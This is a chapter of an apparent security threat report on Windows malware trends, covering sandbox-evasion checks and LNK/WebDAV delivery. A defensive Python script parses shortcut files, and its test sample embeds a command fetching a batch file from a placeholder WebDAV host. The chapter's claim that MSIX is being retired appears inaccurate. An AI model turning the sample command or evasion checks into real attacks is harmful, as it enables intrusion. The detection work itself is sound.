Chapter 3: Windows: A Prime Target for Cyber Threats


Windows remains a central focus for cyberattacks, being the predominant desktop operating system globally. The well-established attack strategies persist, with Stealers, Loaders, and Ransomware continuing as the primary threats. Notably, ransomware poses a significant global financial risk, affecting diverse sectors.


Trends in Threats

Healthcare Under Siege: Escalating Attacks and DDoS Threats

Healthcare providers, a critical sector, face an upsurge in cyber threats. Beyond ransomware, Distributed Denial of Service (DDoS) attacks have emerged, impacting facilities worldwide, including Germany, the United States, and Canada.


Rising Sophistication: Novel Evasion Techniques in Windows Malware

Windows-focused malware reaches new levels of sophistication, employing advanced evasion techniques.

Tactics include indirect syscalls, checking whether the machine is joined to a domain or Azure Active Directory, determining if a monitor is attached, and assessing if the system has more than 6-8 GB of RAM (checks intended to tell analysis sandboxes apart from real user machines). These advanced evasion methods indicate an escalating arms race between cybercriminals and cybersecurity defenses.


LNK Files and WebDAV Paths: Shifting Attack Methodologies

A notable challenge arises from the heightened complexity of LNK files, which now chain multiple tools such as PowerShell and batch scripting within a single LNK reference. Additionally, there is a surge in the misuse of WebDAV (or UNC/MUP) paths for malware downloads, reflecting a shift in attack methodologies.
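As an added defender-side example (not code from the report), the following Python script parses a shortcut's string fields straight from the MS-SHLLINK binary layout and flags the two traits described above: several interpreters chained inside one shortcut, and WebDAV or UNC paths pointing at the payload. The sample shortcut, the placeholder host files.example.test and the interpreter list are constructed for this illustration.

```python
import re
import struct
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 1 << 0, 1 << 1, 1 << 2, 1 << 3
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 1 << 4, 1 << 5, 1 << 6, 1 << 7
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH), ("working_dir", HAS_WORKING_DIR),
                 ("arguments", HAS_ARGUMENTS), ("icon_location", HAS_ICON_LOCATION))
INTERPRETERS = ("cmd.exe", "powershell", "pwsh", "mshta", "wscript", "cscript", "rundll32")

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (relative path, arguments, ...) of a .lnk file."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = 0x4C                                      # end of the fixed-size ShellLinkHeader
    if flags & HAS_ID_LIST:                         # skip the size-prefixed LinkTargetIDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                       # skip the size-prefixed LinkInfo block
        off += struct.unpack_from("<I", data, off)[0]
    fields, width = {}, (2 if flags & IS_UNICODE else 1)
    for name, bit in STRING_FIELDS:                 # each string: u16 char count, then chars
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]
            raw = data[off + 2:off + 2 + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            off += 2 + count * width
    return fields

def triage(fields: dict) -> list:
    """Flag several interpreters chained in one shortcut and WebDAV/UNC download paths."""
    blob, findings = " ".join(fields.values()).lower(), []
    tools = sorted(t for t in INTERPRETERS if t in blob)
    if len(tools) >= 2:
        findings.append("multiple_interpreters:" + ",".join(tools))
    if "davwwwroot" in blob or re.search(r"\\\\[^\\\s]+@(ssl@)?\d+\\", blob):
        findings.append("webdav_path")              # \\host@SSL@443\DavWWWRoot\... style path
    elif re.search(r"\\\\[^\\\s]+\\", blob):
        findings.append("unc_path")
    return findings

def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal .lnk for testing: header plus two Unicode StringData fields."""
    header = bytearray(0x4C)
    struct.pack_into("<I", header, 0, 0x4C)
    header[4:20] = LNK_CLSID
    struct.pack_into("<I", header, 0x14, HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relative_path, arguments))
    return bytes(header) + body

SAMPLE = build_lnk(r"..\..\Windows\System32\cmd.exe",  # constructed sample with a placeholder host
                   r'/c powershell -c "copy \\files.example.test@SSL@443\DavWWWRoot\update.bat ."')
```

Running `triage(parse_lnk(SAMPLE))` on the constructed sample reports both the chained interpreters and the WebDAV path; a shortcut to a document yields no findings.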


Microsoft’s Security Measures: Phasing Out Vulnerable Features

In response to these escalating threats, Microsoft has made strategic decisions to retire two features commonly exploited by malware developers. Both VBScript, a scripting language favored by many malware creators, and the MSIX app package format are being phased out.

This move represents an important step by Microsoft to enhance the security of its operating system and protect users from malicious software.